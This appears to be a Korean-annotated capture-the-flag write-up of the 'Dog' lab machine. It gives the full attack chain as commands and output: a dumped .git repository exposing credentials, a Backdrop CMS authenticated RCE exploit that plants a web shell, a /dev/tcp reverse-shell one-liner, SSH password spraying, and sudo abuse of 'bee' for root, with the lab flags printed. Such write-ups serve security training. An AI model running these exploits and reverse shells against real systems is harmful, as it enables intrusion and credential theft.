Proof of Concept
10.129.1.13
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
- Backdrop CMS을 사용하고 있으며, 해당 CMS에서 Authenticated RCE 취약점이 존재하는 것을 발견
nmap script
- Git 디렉토리 발견
┌──(kali㉿kali)-[~/Dog]
└─$ sudo nmap 10.129.1.13 --open --min-rate 3000 -oN scan -sCV -p80
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-26 03:30 EST
Nmap scan report for 10.129.1.13
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
| http-git:
| 10.129.1.13:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/replyGit 디렉토리 덤프
┌──(kali㉿kali)-[~/Dog/git_dump]
└─$ git-dumper http://10.129.1.13/.git/ .
[-] Testing http://10.129.1.13/.git/HEAD [200]
[-] Testing http://10.129.1.13/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.129.1.13/.git/ [200]
[-] Fetching http://10.129.1.13/.gitignore [404]
[-] http://10.129.1.13/.gitignore responded with status code 404
[-] Fetching http://10.129.1.13/.git/objects/ [200]
[-] Fetching http://10.129.1.13/.git/COMMIT_EDITMSG [200]
[-] Fetching http://10.129.1.13/.git/logs/ [200]
[-] Fetching http://10.129.1.13/.git/branches/ [200]
[-] Fetching http://10.129.1.13/.git/description [200]
[-] Fetching http://10.129.1.13/.git/HEAD [200]
<SNIP>
[-] Fetching http://10.129.1.13/.git/objects/ff/c418375000d182c805974f2d004e92257178d8 [200]
[-] Fetching http://10.129.1.13/.git/objects/ff/d522e1da8660cb25dce831f19efa284753b691 [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 2873 paths from the index덤프한 Git 레포지토리 내 settings.php 파일에서 MySQL 계정 정보 발견
- root:BackDropJ2024DS2024
┌──(kali㉿kali)-[~/Dog/git_dump]
└─$ cat settings.php
<?php
/**
* @file
* Main Backdrop CMS configuration file.
*/
/**
* Database configuration:
*
* Most sites can configure their database by entering the connection string
* below. If using primary/replica databases or multiple connections, see the
* advanced database documentation at
* https://api.backdropcms.org/database-configuration
*/
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';Git 레보지토리에서 사용자 이름 발견
┌──(kali㉿kali)-[~/Dog/git-dumper]
└─$ grep -i -r dog.htb .
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"획득한 계정 정보로 웹 서비스 로그인 성공
- tiffany:BackDropJ2024DS2024
POC 다운로드
┌──(kali㉿kali)-[~/Dog]
└─$ git clone https://github.com/rvizx/backdrop-rce
Cloning into 'backdrop-rce'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 11 (delta 1), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (11/11), 5.15 KiB | 2.57 MiB/s, done.
Resolving deltas: 100% (1/1), done.POC가 성공적으로 실행될 경우 리눅스 명령어 실행 가능
┌──(kali㉿kali)-[~/Dog/backdrop-rce]
└─$ python exploit.py http://10.129.1.13 tiffany BackDropJ2024DS2024
[>] logging in as user: 'tiffany'
[>] login successful
[>] enabling maintenance mode
[>] maintenance enabled
[>] payload archive: /tmp/bd_x3qrlh_j/rvz2be891.tgz
[>] fetching installer form
[>] uploading payload (bulk empty)
[>] initial upload post complete
[>] batch id = 13; sending authorize ‘do_nojs’ and ‘do’
[>] waiting for shell at: http://10.129.1.13/modules/rvz2be891/shell.php
[>] shell is live
[>] interactive shell – type 'exit' to quit
kali@10.129.1.13 > 온전한 쉘 획득을 위해 리버스 쉘 명령어 실행
kali@10.129.1.13 > bash -c "sh -i >& /dev/tcp/10.10.14.17/4444 0>&1"리버스 쉘 연결 성공
┌──(kali㉿kali)-[~/Dog]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.1.13] 44836
sh: 0: can't access tty; job control turned off
$Lateral Movemnet
home 디렉토리에서 사용자 확인
- jobert
- johncusack
www-data@dog:/var/www/html/modules$ cd /home
cd /home
www-data@dog:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 15 2024 .
drwxr-xr-x 19 root root 4096 Feb 7 2025 ..
drwxr-xr-x 4 jobert jobert 4096 Feb 7 2025 jobert
drwxr-xr-x 3 johncusack johncusack 4096 Feb 7 2025 johncusack이전에 획득한 비밀번호를 사용해 Password spray 공격 수행
- johncusack:BackDropJ2024DS2024으로 인증 성공
┌──(kali㉿kali)-[~/Dog]
└─$ cat users.txt
jobert
johncusack
┌──(kali㉿kali)-[~/Dog]
└─$ nxc ssh 10.129.1.13 -u users.txt -p 'BackDropJ2024DS2024' --continue-on-success -t 100
SSH 10.129.1.13 22 10.129.1.13 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12
SSH 10.129.1.13 22 10.129.1.13 [-] jobert:BackDropJ2024DS2024
SSH 10.129.1.13 22 10.129.1.13 [+] johncusack:BackDropJ2024DS2024 Linux - Shell access!SSH 접속
┌──(kali㉿kali)-[~/Dog]
└─$ sshpass -p 'BackDropJ2024DS2024' ssh johncusack@10.129.1.13
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
<SNIP>
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Mar 4 17:04:29 2025 from 10.10.14.17
johncusack@dog:~$Read user.txt
johncusack@dog:~$ cat user.txt
91feb60c2eb6c5a67c87f2e82f04a17b
johncusack@dog:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.1.13 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb0:9763 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb0:9763 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b0:97:63 txqueuelen 1000 (Ethernet)
RX packets 35499 bytes 3551848 (3.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16240 bytes 19498622 (19.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 43790 bytes 47425142 (47.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 43790 bytes 47425142 (47.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Privilege Escalation
sudo로 실행할 수 있는 명령어 확인
- bee 명령어 사용 가능
johncusack@dog:~$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/beebee 명령어를 사용하여 루트 쉘 획득
johncusack@dog:~$ sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash');"
root@dog:/var/www/html#Read root.txt
root@dog:~# cat root.txt
dd98188e9126c9238cc8a1a0fc670fd4
root@dog:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.1.13 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb0:9763 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb0:9763 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b0:97:63 txqueuelen 1000 (Ethernet)
RX packets 36821 bytes 3644206 (3.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16536 bytes 19526122 (19.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 44218 bytes 47532523 (47.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 44218 bytes 47532523 (47.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0